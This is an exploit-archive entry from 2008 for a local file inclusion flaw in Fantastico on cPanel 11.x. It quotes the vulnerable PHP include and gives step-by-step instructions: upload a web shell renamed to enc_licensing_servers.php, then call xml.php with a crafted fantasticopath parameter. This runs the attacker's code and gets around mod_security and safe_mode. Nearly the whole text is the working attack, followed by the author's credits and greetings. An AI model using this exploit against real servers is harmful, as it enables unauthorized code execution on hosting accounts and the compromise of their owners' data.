[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Cpanel <= 11.x (Fantastico) LFI Vulnerability (sec bypass)
# Published : 2008-09-14
# Author : joker_1
# Previous Title : Kasseler CMS 1.1.0/1.2.0 Lite Remote SQL Injection Vulnerabilities
# Next Title : pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit


##############################################################
Fantastico In all Version Cpanel 11.x <= local File Include

##############################################################


Must login to  :2082
To break the protection   mod_security  & safe_mode: off  & Disable functions :  all none

 

Vulnerable Code

$licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php";
if (is_file($licensing_servers))
       {
       include($licensing_servers);


in

http://xx.com:2082/frontend/x/fantastico/includes/xml.php


Exploit >>

First Create directory Let the name  /includes/ and upload Shell.php  in  /includes/  Then  rename it to enc_licensing_servers.php


:::xploit::::

http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user

 

###################################################

Discoverd By : joker_1

 

for info : pl57@msn.com

 

###################################################

Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star

###################################################

# www.Syue.com [2008-09-14]